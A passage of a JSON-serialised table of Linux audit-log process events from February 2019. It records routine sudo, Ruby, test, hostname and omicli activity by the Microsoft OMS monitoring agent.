/var/log/audit/audit.log\"],\"cwd\":[\"NaN\",\"/\",\"/\",\"/\",\"/\",\"/\",\"/\",\"/\",\"/\",\"/\",\"/\",\"/\",\"/\",\"/\",\"/\",\"/\",\"/\",\"/\",\"/\",\"/\",\"/\",\"/\",\"/\",\"/\",\"/\",\"/\",\"/\",\"/\",\"/\",\"/\",\"/\",\"/\",\"/\",\"/\",\"/\",\"/\",\"/\",\"/\",\"/\",\"/\",\"/\",\"/\",\"/\",\"/\",\"/\",\"/\",\"/\",\"/\",\"/\",\"/\",\"/\",\"/\",\"/\",\"/\",\"/\",\"/\",\"/\",\"/\",\"/\",\"/\",\"/\",\"/\",\"/\",\"/\"],\"egid\":[\"NaN\",\"999\",\"0\",\"0\",\"0\",\"999\",\"999\",\"999\",\"999\",\"999\",\"999\",\"999\",\"999\",\"0\",\"0\",\"0\",\"999\",\"0\",\"0\",\"0\",\"999\",\"0\",\"0\",\"0\",\"999\",\"0\",\"0\",\"0\",\"999\",\"0\",\"0\",\"0\",\"999\",\"0\",\"0\",\"0\",\"999\",\"0\",\"0\",\"0\",\"999\",\"0\",\"0\",\"0\",\"999\",\"0\",\"0\",\"0\",\"999\",\"0\",\"0\",\"0\",\"999\",\"0\",\"0\",\"0\",\"999\",\"0\",\"0\",\"0\",\"999\",\"0\",\"0\",\"0\"],\"euid\":[\"NaN\",\"0\",\"0\",\"0\",\"0\",\"998\",\"998\",\"998\",\"998\",\"998\",\"998\",\"998\",\"0\",\"0\",\"0\",\"0\",\"0\",\"0\",\"0\",\"0\",\"0\",\"0\",\"0\",\"0\",\"0\",\"0\",\"0\",\"0\",\"0\",\"0\",\"0\",\"0\",\"0\",\"0\",\"0\",\"0\",\"0\",\"0\",\"0\",\"0\",\"0\",\"0\",\"0\",\"0\",\"0\",\"0\",\"0\",\"0\",\"0\",\"0\",\"0\",\"0\",\"0\",\"0\",\"0\",\"0\",\"0\",\"0\",\"0\",\"0\",\"0\",\"0\",\"0\",\"0\"],\"exe\":[\"unknown\",\"/usr/bin/sudo\",\"/opt/microsoft/omsagent/ruby/bin/ruby\",\"/usr/bin/sudo\",\"/usr/bin/test\",\"/bin/dash\",\"/bin/hostname\",\"/bin/dash\",\"/bin/hostname\",\"/bin/dash\",\"/bin/grep\",\"/opt/omi/bin/omicli\",\"/usr/bin/sudo\",\"/opt/microsoft/omsagent/ruby/bin/ruby\",\"/usr/bin/sudo\",\"/usr/bin/test\",\"/usr/bin/sudo\",\"/opt/microsoft/omsagent/ruby/bin/ruby\",\"/usr/bin/sudo\",\"/usr/bin/test\",\"/usr/bin/sudo\",\"/opt/microsoft/omsagent/ruby/bin/ruby\",\"/usr/bin/sudo\",\"/usr/bin/test\",\"/usr/bin/sudo\",\"/opt/microsoft/omsagent/ruby/bin/ruby\",\"/usr/bin/sudo\",\"/usr/bin/test\",\"/usr/bin/sudo\",\"/opt/microsoft/omsagent/ruby/bin/ruby\",\"/usr/bin/sudo\",\"/usr/bin/test\",\"/usr/bin/sudo\",\"/opt/microsoft/omsagent/ruby/bin/ruby\",\"/usr/bin/sudo\",\"/usr/bin/test\",\"/usr/bin/sudo\",\"/opt/microsoft/omsagent/ruby/bin/ruby\",\"/usr/bin/sudo\",\"/usr/bin/test\",\"/usr/bin/sudo\",\"/opt/microsoft/omsagent/ruby/bin/ruby\",\"/usr/bin/sudo\",\"/usr/bin/test\",\"/usr/bin/sudo\",\"/opt/microsoft/omsagent/ruby/bin/ruby\",\"/usr/bin/sudo\",\"/usr/bin/test\",\"/usr/bin/sudo\",\"/opt/microsoft/omsagent/ruby/bin/ruby\",\"/usr/bin/sudo\",\"/usr/bin/test\",\"/usr/bin/sudo\",\"/opt/microsoft/omsagent/ruby/bin/ruby\",\"/usr/bin/sudo\",\"/usr/bin/test\",\"/usr/bin/sudo\",\"/opt/microsoft/omsagent/ruby/bin/ruby\",\"/usr/bin/sudo\",\"/usr/bin/test\",\"/usr/bin/sudo\",\"/opt/microsoft/omsagent/ruby/bin/ruby\",\"/usr/bin/sudo\",\"/usr/bin/test\"],\"exe_par\":[\"NaN\",\"unknown\",\"/usr/bin/sudo\",\"/opt/microsoft/omsagent/ruby/bin/ruby\",\"/usr/bin/sudo\",\"unknown\",\"unknown\",\"unknown\",\"/bin/dash\",\"unknown\",\"/bin/dash\",\"/bin/dash\",\"unknown\",\"/usr/bin/sudo\",\"/opt/microsoft/omsagent/ruby/bin/ruby\",\"/usr/bin/sudo\",\"unknown\",\"/usr/bin/sudo\",\"/opt/microsoft/omsagent/ruby/bin/ruby\",\"/usr/bin/sudo\",\"unknown\",\"/usr/bin/sudo\",\"/opt/microsoft/omsagent/ruby/bin/ruby\",\"/usr/bin/sudo\",\"unknown\",\"/usr/bin/sudo\",\"/opt/microsoft/omsagent/ruby/bin/ruby\",\"/usr/bin/sudo\",\"unknown\",\"/usr/bin/sudo\",\"/opt/microsoft/omsagent/ruby/bin/ruby\",\"/usr/bin/sudo\",\"unknown\",\"/usr/bin/sudo\",\"/opt/microsoft/omsagent/ruby/bin/ruby\",\"/usr/bin/sudo\",\"unknown\",\"/usr/bin/sudo\",\"/opt/microsoft/omsagent/ruby/bin/ruby\",\"/usr/bin/sudo\",\"unknown\",\"/usr/bin/sudo\",\"/opt/microsoft/omsagent/ruby/bin/ruby\",\"/usr/bin/sudo\",\"unknown\",\"/usr/bin/sudo\",\"/opt/microsoft/omsagent/ruby/bin/ruby\",\"/usr/bin/sudo\",\"unknown\",\"/usr/bin/sudo\",\"/opt/microsoft/omsagent/ruby/bin/ruby\",\"/usr/bin/sudo\",\"unknown\",\"/usr/bin/sudo\",\"/opt/microsoft/omsagent/ruby/bin/ruby\",\"/usr/bin/sudo\",\"unknown\",\"/usr/bin/sudo\",\"/opt/microsoft/omsagent/ruby/bin/ruby\",\"/usr/bin/sudo\",\"unknown\",\"/usr/bin/sudo\",\"/opt/microsoft/omsagent/ruby/bin/ruby\",\"/usr/bin/sudo\"],\"gid\":[\"NaN\",\"999\",\"0\",\"0\",\"0\",\"999\",\"999\",\"999\",\"999\",\"999\",\"999\",\"999\",\"999\",\"0\",\"0\",\"0\",\"999\",\"0\",\"0\",\"0\",\"999\",\"0\",\"0\",\"0\",\"999\",\"0\",\"0\",\"0\",\"999\",\"0\",\"0\",\"0\",\"999\",\"0\",\"0\",\"0\",\"999\",\"0\",\"0\",\"0\",\"999\",\"0\",\"0\",\"0\",\"999\",\"0\",\"0\",\"0\",\"999\",\"0\",\"0\",\"0\",\"999\",\"0\",\"0\",\"0\",\"999\",\"0\",\"0\",\"0\",\"999\",\"0\",\"0\",\"0\"],\"index\":[0,1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56,57,58,59,60,61,62,63],\"mssg_id\":[\"NaN\",\"1550440886.357:8972854\",\"1550440886.369:8972858\",\"1550440886.449:8972859\",\"1550440886.465:8972863\",\"1550441477.946:8973766\",\"1550441484.494:8973771\",\"1550441484.498:8973772\",\"1550441484.498:8973773\",\"1550441484.502:8973774\",\"1550441484.506:8973775\",\"1550441484.506:8973776\",\"1550441487.518:8973781\",\"1550441487.526:8973785\",\"1550441487.594:8973786\",\"1550441487.606:8973790\",\"1550441547.625:8973856\",\"1550441547.633:8973860\",\"1550441547.697:8973861\",\"1550441547.705:8973865\",\"1550443172.052:8976644\",\"1550443172.064:8976648\",\"1550443172.128:8976649\",\"1550443172.136:8976653\",\"1550443652.935:8977399\",\"1550443652.947:8977403\",\"1550443653.011:8977404\",\"1550443653.019:8977408\",\"1550440645.900:8972416\",\"1550440645.912:8972420\",\"1550440645.980:8972421\",\"1550440645.988:8972425\",\"1550445396.066:8980107\",\"1550445396.078:8980111\",\"1550445396.146:8980112\",\"1550445396.158:8980116\",\"1550445456.177:8980190\",\"1550445456.189:8980194\",\"1550445456.253:8980195\",\"1550445456.261:8980199\",\"1550445876.948:8980767\",\"1550445876.960:8980771\",\"1550445877.024:8980772\",\"1550445877.032:8980776\",\"1550445937.047:8980858\",\"1550445937.059:8980862\",\"1550445937.127:8980863\",\"1550445937.139:8980867\",\"1550446780.561:8982452\",\"1550446780.569:8982456\",\"1550446780.637:8982457\",\"1550446780.645:8982461\",\"1550446840.664:8982543\",\"1550446840.676:8982547\",\"1550446840.744:8982548\",\"1550446840.752:8982552\",\"1550449485.480:8986586\",\"1550449485.492:8986590\",\"1550449485.560:8986591\",\"1550449485.568:8986595\",\"1550449545.588:8986677\",\"1550449545.600:8986681\",\"1550449545.664:8986682\",\"1550449545.672:8986686\"],\"new_process_lc\":[\"unknown\",\"/usr/bin/sudo\",\"/opt/microsoft/omsagent/ruby/bin/ruby\",\"/usr/bin/sudo\",\"/usr/bin/test\",\"/bin/dash\",\"/bin/hostname\",\"/bin/dash\",\"/bin/hostname\",\"/bin/dash\",\"/bin/grep\",\"/opt/omi/bin/omicli\",\"/usr/bin/sudo\",\"/opt/microsoft/omsagent/ruby/bin/ruby\",\"/usr/bin/sudo\",\"/usr/bin/test\",\"/usr/bin/sudo\",\"/opt/microsoft/omsagent/ruby/bin/ruby\",\"/usr/bin/sudo\",\"/usr/bin/test\",\"/usr/bin/sudo\",\"/opt/microsoft/omsagent/ruby/bin/ruby\",\"/usr/bin/sudo\",\"/usr/bin/test\",\"/usr/bin/sudo\",\"/opt/microsoft/omsagent/ruby/bin/ruby\",\"/usr/bin/sudo\",\"/usr/bin/test\",\"/usr/bin/sudo\",\"/opt/microsoft/omsagent/ruby/bin/ruby\",\"/usr/bin/sudo\",\"/usr/bin/test\",\"/usr/bin/sudo\",\"/opt/microsoft/omsagent/ruby/bin/ruby\",\"/usr/bin/sudo\",\"/usr/bin/test\",\"/usr/bin/sudo\",\"/opt/microsoft/omsagent/ruby/bin/ruby\",\"/usr/bin/sudo\",\"/usr/bin/test\",\"/usr/bin/sudo\",\"/opt/microsoft/omsagent/ruby/bin/ruby\",\"/usr/bin/sudo\",\"/usr/bin/test\",\"/usr/bin/sudo\",\"/opt/microsoft/omsagent/ruby/bin/ruby\",\"/usr/bin/sudo\",\"/usr/bin/test\",\"/usr/bin/sudo\",\"/opt/microsoft/omsagent/ruby/bin/ruby\",\"/usr/bin/sudo\",\"/usr/bin/test\",\"/usr/bin/sudo\",\"/opt/microsoft/omsagent/ruby/bin/ruby\",\"/usr/bin/sudo\",\"/usr/bin/test\",\"/usr/bin/sudo\",\"/opt/microsoft/omsagent/ruby/bin/ruby\",\"/usr/bin/sudo\",\"/usr/bin/test\",\"/usr/bin/sudo\",\"/opt/microsoft/omsagent/ruby/bin/ruby\",\"/usr/bin/sudo\",\"/usr/bin/test\"],\"new_process_lc_par\":[\"NaN\",\"unknown\",\"/usr/bin/sudo\",\"/opt/microsoft/omsagent/ruby/bin/ruby\",\"/usr/bin/sudo\",\"unknown\",\"unknown\",\"unknown\",\"/bin/dash\",\"unknown\",\"/bin/dash\",\"/bin/dash\",\"unknown\",\"/usr/bin/sudo\",\"/opt/microsoft/omsagent/ruby/bin/ruby\",\"/usr/bin/sudo\",\"unknown\",\"/usr/bin/sudo\",\"/opt/microsoft/omsagent/ruby/bin/ruby\",\"/usr/bin/sudo\",\"unknown\",\"/usr/bin/sudo\",\"/opt/microsoft/omsagent/ruby/bin/ruby\",\"/usr/bin/sudo\",\"unknown\",\"/usr/bin/sudo\",\"/opt/microsoft/omsagent/ruby/bin/ruby\",\"/usr/bin/sudo\",\"unknown\",\"/usr/bin/sudo\",\"/opt/microsoft/omsagent/ruby/bin/ruby\",\"/usr/bin/sudo\",\"unknown\",\"/usr/bin/sudo\",\"/opt/microsoft/omsagent/ruby/bin/ruby\",\"/usr/bin/sudo\",\"unknown\",\"/usr/bin/sudo\",\"/opt/microsoft/omsagent/ruby/bin/ruby\",\"/usr/bin/sudo\",\"unknown\",\"/usr/bin/sudo\",\"/opt/microsoft/omsagent/ruby/bin/ruby\",\"/usr/bin/sudo\",\"unknown\",\"/usr/bin/sudo\",\"/opt/microsoft/omsagent/ruby/bin/ruby\",\"/usr/bin/sudo\",\"unknown\",\"/usr/bin/sudo\",\"/opt/microsoft/omsagent/ruby/bin/ruby\",\"/usr/bin/sudo\",\"unknown\",\"/usr/bin/sudo\",\"/opt/microsoft/omsagent/ruby/bin/ruby\",\"/usr/bin/sudo\",\"unknown\",\"/usr/bin/sudo\",\"/opt/microsoft/omsagent/ruby/bin/ruby\",\"/usr/bin/sudo\",\"unknown\",\"/usr/bin/sudo\",\"/opt/microsoft/omsagent/ruby/bin/ruby\",\"/usr/bin/sudo\"],\"parent_index\":[\"NaN\",\"1002\",\"159\",\"160\",\"161\",\"1002\",\"1002\",\"1002\",\"217\",\"1002\",\"218\",\"218\",\"1002\",\"225\",\"226\",\"227\",\"1002\",\"284\",\"285\",\"286\",\"1002\",\"411\",\"412\",\"413\",\"1002\",\"470\",\"471\",\"472\",\"1002\",\"55\",\"56\",\"57\",\"1002\",\"569\",\"570\",\"571\",\"1002\",\"630\",\"631\",\"632\",\"1002\",\"689\",\"690\",\"691\",\"1002\",\"752\",\"753\",\"754\",\"1002\",\"811\",\"812\",\"813\",\"1002\",\"874\",\"875\",\"876\",\"1002\",\"933\",\"934\",\"935\",\"1002\",\"996\",\"997\",\"998\"],\"parent_key\":[\"NaN\",\"unknown13501970-01-01 00:00:00.000000\",\"/usr/bin/sudo263732019-02-17 22:01:26.357000\",\"/opt/microsoft/omsagent/ruby/bin/ruby263752019-02-17 22:01:26.369000\",\"/usr/bin/sudo263772019-02-17 22:01:26.449000\",\"unknown13501970-01-01 00:00:00.000000\",\"unknown13501970-01-01 00:00:00.000000\",\"unknown13501970-01-01 00:00:00.000000\",\"/bin/dash272332019-02-17 22:11:24.498000\",\"unknown13501970-01-01 00:00:00.000000\",\"/bin/dash272352019-02-17 22:11:24.502000\",\"/bin/dash272352019-02-17 22:11:24.502000\",\"unknown13501970-01-01 00:00:00.000000\",\"/usr/bin/sudo272482019-02-17 22:11:27.518000\",\"/opt/microsoft/omsagent/ruby/bin/ruby272502019-02-17 22:11:27.526000\",\"/usr/bin/sudo272522019-02-17 22:11:27.594000\",\"unknown13501970-01-01 00:00:00.000000\",\"/usr/bin/sudo273212019-02-17 22:12:27.625000\",\"/opt/microsoft/omsagent/ruby/bin/ruby273232019-02-17 22:12:27.633000\",\"/usr/bin/sudo273252019-02-17 22:12:27.697000\",\"unknown13501970-01-01 00:00:00.000000\",\"/usr/bin/sudo299812019-02-17 22:39:32.052000\",\"/opt/microsoft/omsagent/ruby/bin/ruby299832019-02-17 22:39:32.064000\",\"/usr/bin/sudo299852019-02-17 22:39:32.128000\",\"unknown13501970-01-01 00:00:00.000000\",\"/usr/bin/sudo306672019-02-17 22:47:32.935000\",\"/opt/microsoft/omsagent/ruby/bin/ruby306692019-02-17 22:47:32.947000\",\"/usr/bin/sudo306712019-02-17 22:47:33.011000\",\"unknown13501970-01-01 00:00:00.000000\",\"/usr/bin/sudo259882019-02-17 21:57:25.900000\",\"/opt/microsoft/omsagent/ruby/bin/ruby259902019-02-17 21:57:25.912000\",\"/usr/bin/sudo259922019-02-17 21:57:25.980000\",\"unknown13501970-01-01 00:00:00.000000\",\"/usr/bin/sudo7222019-02-17 23:16:36.066000\",\"/opt/microsoft/omsagent/ruby/bin/ruby7242019-02-17 23:16:36.078000\",\"/usr/bin/sudo7262019-02-17 23:16:36.146000\",\"unknown13501970-01-01 00:00:00.000000\",\"/usr/bin/sudo7982019-02-17 23:17:36.177000\",\"/opt/microsoft/omsagent/ruby/bin/ruby8002019-02-17 23:17:36.189000\",\"/usr/bin/sudo8022019-02-17 23:17:36.253000\",\"unknown13501970-01-01 00:00:00.000000\",\"/usr/bin/sudo14212019-02-17 23:24:36.948000\",\"/opt/microsoft/omsagent/ruby/bin/ruby14232019-02-17 23:24:36.960000\",\"/usr/bin/sudo14252019-02-17 23:24:37.024000\",\"unknown13501970-01-01 00:00:00.000000\",\"/usr/bin/sudo15012019-02-17 23:25:37.047000\",\"/opt/microsoft/omsagent/ruby/bin/ruby15032019-02-17 23:25:37.059000\",\"/usr/bin/sudo15052019-02-17 23:25:37.127000\",\"unknown13501970-01-01 00:00:00.000000\",\"/usr/bin/sudo30602019-02-17 23:39:40.561000\",\"/opt/microsoft/omsagent/ruby/bin/ruby30622019-02-17 23:39:40.569000\",\"/usr/bin/sudo30642019-02-17 23:39:40.637000\",\"unknown13501970-01-01 00:00:00.000000\",\"/usr/bin/sudo31402019-02-17 23:40:40.664000\",\"/opt/microsoft/omsagent/ruby/bin/ruby31422019-02-17 23:40:40.676000\",\"/usr/bin/sudo31442019-02-17 23:40:40.744000\",\"unknown13501970-01-01 00:00:00.000000\",\"/usr/bin/sudo69422019-02-18 00:24:45.480000\",\"/opt/microsoft/omsagent/ruby/bin/ruby69442019-02-18 00:24:45.492000\",\"/usr/bin/sudo69462019-02-18 00:24:45.560000\",\"unknown13501970-01-01 00:00:00.000000\",\"/usr/bin/sudo70212019-02-18 00:25:45.588000\",\"/opt/microsoft/omsagent/ruby/bin/ruby70232019-02-18 00:25:45.600000\",\"/usr/bin/sudo70252019-02-18 00:25:45.664000\"],\"parent_proc_lc\":[\"NaN\",\"unknown\",\"/usr/bin/sudo\",\"/opt/microsoft/omsagent/ruby/bin/ruby\",\"/usr/bin/sudo\",\"unknown\",\"unknown\",\"unknown\",\"/bin/dash\",\"unknown\",\"/bin/dash\",\"/bin/dash\",\"unknown\",\"/usr/bin/sudo\",\"/opt/microsoft/omsagent/ruby/bin/ruby\",\"/usr/bin/sudo\",\"unknown\",\"/usr/bin/sudo\",\"/opt/microsoft/omsagent/ruby/bin/ruby\",\"/usr/bin/sudo\",\"unknown\",\"/usr/bin/sudo\",\"/opt/microsoft/omsagent/ruby/bin/ruby\",\"/usr/bin/sudo\",\"unknown\",\"/usr/bin/sudo\",\"/opt/microsoft/omsagent/ruby/bin/ruby\",\"/usr/bin/sudo\",\"unknown\",\"/usr/bin/sudo\",\"/opt/microsoft/omsagent/ruby/bin/ruby\",\"/usr/bin/sudo\",\"unknown\",\"/usr/bin/sudo\",\"/opt/microsoft/omsagent/ruby/bin/ruby\",\"/usr/bin/sudo\",\"unknown\",\"/usr/bin/sudo\",\"/opt/microsoft/omsagent/ruby/bin/ruby\",\"/usr/bin/sudo\",\"unknown\",\"/usr/bin/sudo\",\"/opt/microsoft/omsagent/ruby/bin/ruby\",\"/usr/bin/sudo\",\"unknown\",\"/usr/bin/sudo\",\"/opt/microsoft/omsagent/ruby/bin/ruby\",\"/usr/bin/sudo\",\"unknown\",\"/usr/bin/sudo\",\"/opt/microsoft/omsagent/ruby/bin/ruby\",\"/usr/bin/sudo\",\"unknown\",\"/usr/bin/sudo\",\"/opt/microsoft/omsagent/ruby/bin/ruby\",\"/usr/bin/sudo\",\"unknown\",\"/usr/bin/sudo\",\"/opt/microsoft/omsagent/ruby/bin/ruby\",\"/usr/bin/sudo\",\"unknown\",\"/usr/bin/sudo\",\"/opt/microsoft/omsagent/ruby/bin/ruby\",\"/usr/bin/sudo\"],\"path\":[\"1002\",\"1002/159\",\"1002/159/160\",\"1002/159/160/161\",\"1002/159/160/161/162\",\"1002/210\",\"1002/215\",\"1002/217\",\"1002/217/216\",\"1002/218\",\"1002/218/219\",\"1002/218/220\",\"1002/225\",\"1002/225/226\",\"1002/225/226/227\",\"1002/225/226/227/228\",\"1002/284\",\"1002/284/285\",\"1002/284/285/286\",\"1002/284/285/286/287\",\"1002/411\",\"1002/411/412\",\"1002/411/412/413\",\"1002/411/412/413/414\",\"1002/470\",\"1002/470/471\",\"1002/470/471/472\",\"1002/470/471/472/473\",\"1002/55\",\"1002/55/56\",\"1002/55/56/57\",\"1002/55/56/57/58\",\"1002/569\",\"1002/569/570\",\"1002/569/570/571\",\"1002/569/570/571/572\",\"1002/630\",\"1002/630/631\",\"1002/630/631/632\",\"1002/630/631/632/633\",\"1002/689\",\"1002/689/690\",\"1002/689/690/691\",\"1002/689/690/691/692\",\"1002/752\",\"1002/752/753\",\"1002/752/753/754\",\"1002/752/753/754/755\",\"1002/811\",\"1002/811/812\",\"1002/811/812/813\",\"1002/811/812/813/814\",\"1002/874\",\"1002/874/875\",\"1002/874/875/876\",\"1002/874/875/876/877\",\"1002/933\",\"1002/933/934\",\"1002/933/934/935\",\"1002/933/934/935/936\",\"1002/996\",\"1002/996/997\",\"1002/996/997/998\",\"1002/996/997/998/999\"],\"pid\":[\"1350\",\"26373\",\"26375\",\"26377\",\"26378\",\"27227\",\"27232\",\"27233\",\"27234\",\"27235\",\"27237\",\"27236\",\"27248\",\"27250\",\"27252\",\"27253\",\"27321\",\"27323\",\"27325\",\"27326\",\"29981\",\"29983\",\"29985\",\"29986\",\"30667\",\"30669\",\"30671\",\"30672\",\"25988\",\"25990\",\"25992\",\"25993\",\"722\",\"724\",\"726\",\"727\",\"798\",\"800\",\"802\",\"803\",\"1421\",\"1423\",\"1425\",\"1426\",\"1501\",\"1503\",\"1505\",\"1506\",\"3060\",\"3062\",\"3064\",\"3065\",\"3140\",\"3142\",\"3144\",\"3145\",\"6942\",\"6944\",\"6946\",\"6947\",\"7021\",\"7023\",\"7025\",\"7026\"],\"pid_par\":[\"NaN\",\"NaN\",\"26373\",\"26375\",\"26377\",\"NaN\",\"NaN\",\"NaN\",\"27233\",\"NaN\",\"27235\",\"27235\",\"NaN\",\"27248\",\"27250\",\"27252\",\"NaN\",\"27321\",\"27323\",\"27325\",\"NaN\",\"29981\",\"29983\",\"29985\",\"NaN\",\"30667\",\"30669\",\"30671\",\"NaN\",\"25988\",\"25990\",\"25992\",\"NaN\",\"722\",\"724\",\"726\",\"NaN\",\"798\",\"800\",\"802\",\"NaN\",\"1421\",\"1423\",\"1425\",\"NaN\",\"1501\",\"1503\",\"1505\",\"NaN\",\"3060\",\"3062\",\"3064\",\"NaN\",\"3140\",\"3142\",\"3144\",\"NaN\",\"6942\",\"6944\",\"6946\",\"NaN\",\"7021\",\"7023\",\"7025\"],\"ppid\":[\"NaN\",\"1350\",\"26373\",\"26375\",\"26377\",\"1350\",\"1350\",\"1350\",\"27233\",\"1350\",\"27235\",\"27235\",\"1350\",\"27248\",\"27250\",\"27252\",\"1350\",\"27321\",\"27323\",\"27325\",\"1350\",\"29981\",\"29983\",\"29985\",\"1350\",\"30667\",\"30669\",\"30671\",\"1350\",\"25988\",\"25990\",\"25992\",\"1350\",\"722\",\"724\",\"726\",\"1350\",\"798\",\"800\",\"802\",\"1350\",\"1421\",\"1423\",\"1425\",\"1350\",\"1501\",\"1503\",\"1505\",\"1350\",\"3060\",\"3062\",\"3064\",\"1350\",\"3140\",\"3142\",\"3144\",\"1350\",\"6942\",\"6944\",\"6946\",\"1350\",\"7021\",\"7023\",\"7025\"],\"ppid_par\":[\"NaN\",\"NaN\",\"1350\",\"26373\",\"26375\",\"NaN\",\"NaN\",\"NaN\",\"1350\",\"NaN\",\"1350\",\"1350\",\"NaN\",\"1350\",\"27248\",\"27250\",\"NaN\",\"1350\",\"27321\",\"27323\",\"NaN\",\"1350\",\"29981\",\"29983\",\"NaN\",\"1350\",\"30667\",\"30669\",\"NaN\",\"1350\",\"25988\",\"25990\",\"NaN\",\"1350\",\"722\",\"724\",\"NaN\",\"1350\",\"798\",\"800\",\"NaN\",\"1350\",\"1421\",\"1423\",\"NaN\",\"1350\",\"1501\",\"1503\",\"NaN\",\"1350\",\"3060\",\"3062\",\"NaN\",\"1350\",\"3140\",\"3142\",\"NaN\",\"1350\",\"6942\",\"6944\",\"NaN\",\"1350\",\"7021\",\"7023\"],\"proc_key\":[\"unknown13501970-01-01 00:00:00.000000\",\"/usr/bin/sudo263732019-02-17 22:01:26.357000\",\"/opt/microsoft/omsagent/ruby/bin/ruby263752019-02-17 22:01:26.369000\",\"/usr/bin/sudo263772019-02-17 22:01:26.449000\",\"/usr/bin/test263782019-02-17 22:01:26.465000\",\"/bin/dash272272019-02-17 22:11:17.946000\",\"/bin/hostname272322019-02-17 22:11:24.494000\",\"/bin/dash272332019-02-17 22:11:24.498000\",\"/bin/hostname272342019-02-17 22:11:24.498000\",\"/bin/dash272352019-02-17 22:11:24.502000\",\"/bin/grep272372019-02-17 22:11:24.506000\",\"/opt/omi/bin/omicli272362019-02-17 22:11:24.506000\",\"/usr/bin/sudo272482019-02-17 22:11:27.518000\",\"/opt/microsoft/omsagent/ruby/bin/ruby272502019-02-17 22:11:27.526000\",\"/usr/bin/sudo272522019-02-17 22:11:27.594000\",\"/usr/bin/test272532019-02-17 22:11:27.606000\",\"/usr/bin/sudo273212019-02-17 22:12:27.625000\",\"/opt/microsoft/omsagent/ruby/bin/ruby273232019-02-17 22:12:27.633000\",\"/usr/bin/sudo273252019-02-17 22:12:27.697000\",\"/usr/bin/test273262019-02-17 22:12:27.705000\",\"/usr/bin/sudo299812019-02-17 22:39:32.052000\",\"/opt/microsoft/omsagent/ruby/bin/ruby299832019-02-17 22:39:32.064000\",\"/usr/bin/sudo299852019-02-17 22:39:32.128000\",\"/usr/bin/test299862019-02-17 22:39:32.136000\",\"/usr/bin/sudo306672019-02-17 22:47:32.935000\",\"/opt/microsoft/omsagent/ruby/bin/ruby306692019-02-17 22:47:32.947000\",\"/usr/bin/sudo306712019-02-17 22:47:33.011000\",\"/usr/bin/test306722019-02-17 22:47:33.019000\",\"/usr/bin/sudo259882019-02-17 21:57:25.900000\",\"/opt/microsoft/omsagent/ruby/bin/ruby259902019-02-17 21:57:25.912000\",\"/usr/bin/sudo259922019-02-17 21:57:25.980000\",\"/usr/bin/test259932019-02-17 21:57:25.988000\",\"/usr/bin/sudo7222019-02-17 23:16:36.066000\",\"/opt/microsoft/omsagent/ruby/bin/ruby7242019-02-17 23:16:36.078000\",\"/usr/bin/sudo7262019-02-17 23:16:36.146000\",\"/usr/bin/test7272019-02-17 23:16:36.158000\",\"/usr/bin/sudo7982019-02-17 23:17:36.177000\",\"/opt/microsoft/omsagent/ruby/bin/ruby8002019-02-17 23:17:36.189000\",\"/usr/bin/sudo8022019-02-17 23:17:36.253000\",\"/usr/bin/test8032019-02-17 23:17:36.261000\",\"/usr/bin/sudo14212019-02-17 23:24:36.948000\",\"/opt/microsoft/omsagent/ruby/bin/ruby14232019-02-17 23:24:36.960000\",\"/usr/bin/sudo14252019-02-17 23:24:37.024000\",\"/usr/bin/test14262019-02-17 23:24:37.032000\",\"/usr/bin/sudo15012019-02-17 23:25:37.047000\",\"/opt/microsoft/omsagent/ruby/bin/ruby15032019-02-17 23:25:37.059000\",\"/usr/bin/sudo15052019-02-17 23:25:37.127000\",\"/usr/bin/test15062019-02-17 23:25:37.139000\",\"/usr/bin/sudo30602019-02-17 23:39:40.561000\",\"/opt/microsoft/omsagent/ruby/bin/ruby30622019-02-17 23:39:40.569000\",\"/usr/bin/sudo30642019-02-17 23:39:40.637000\",\"/usr/bin/test30652019-02-17 23:39:40.645000\",\"/usr/bin/sudo31402019-02-17 23:40:40.664000\",\"/opt/microsoft/omsagent/ruby/bin/ruby31422019-02-17 23:40:40.676000\",\"/usr/bin/sudo31442019-02-17 23:40:40.744000\",\"/usr/bin/test31452019-02-17 23:40:40.752000\",\"/usr/bin/sudo69422019-02-18 00:24:45.480000\",\"/opt/microsoft/omsagent/ruby/bin/ruby69442019-02-18 00:24:45.492000\",\"/usr/bin/sudo69462019-02-18 00:24:45.560000\",\"/usr/bin/test69472019-02-18 00:24:45.568000\",\"/usr/bin/sudo70212019-02-18 00:25:45.588000\",\"/opt/microsoft/omsagent/ruby/bin/ruby70232019-02-18 00:25:45.600000\",\"/usr/bin/sudo70252019-02-18 00:25:45.664000\",\"/usr/bin/test70262019-02-18 00:25:45.672000\"],\"proctitle\":[\"NaN\",\"sudo\\u0000/opt/microsoft/omsagent/ruby/bin/ruby\\u0000/opt/microsoft/omsagent/plugin/tailfilereader.rb\\u0000/var/log/audit/audit.log\\u0000-p\\u0000/var/opt\",\"/opt/microsoft/omsagent/ruby/bin/ruby\\u0000/opt/microsoft/omsagent/plugin/tailfilereader.rb\\u0000/var/log/audit/audit.log\\u0000-p\\u0000/var/opt/micr\",\"sudo\\u0000test\\u0000-f\\u0000/var/log/audit/audit.log\",\"test\\u0000-f\\u0000/var/log/audit/audit.log\",\"sh\\u0000-c\\u0000echo > /dev/null\",\"hostname\",\"sh\\u0000-c\\u0000hostname -d 2> /dev/null\",\"hostname\\u0000-d\",\"sh\\u0000-c\\u0000/opt/omi/bin/omicli wql root/scx \\\"SELECT PercentUserTime, PercentPrivilegedTime, UsedMemory, PercentUsedMemory FROM SCX_Un\",\"grep\\u0000=\",\"/opt/omi/bin/omicli\\u0000wql\\u0000root/scx\\u0000SELECT PercentUserTime, PercentPrivilegedTime, UsedMemory, PercentUsedMemory FROM 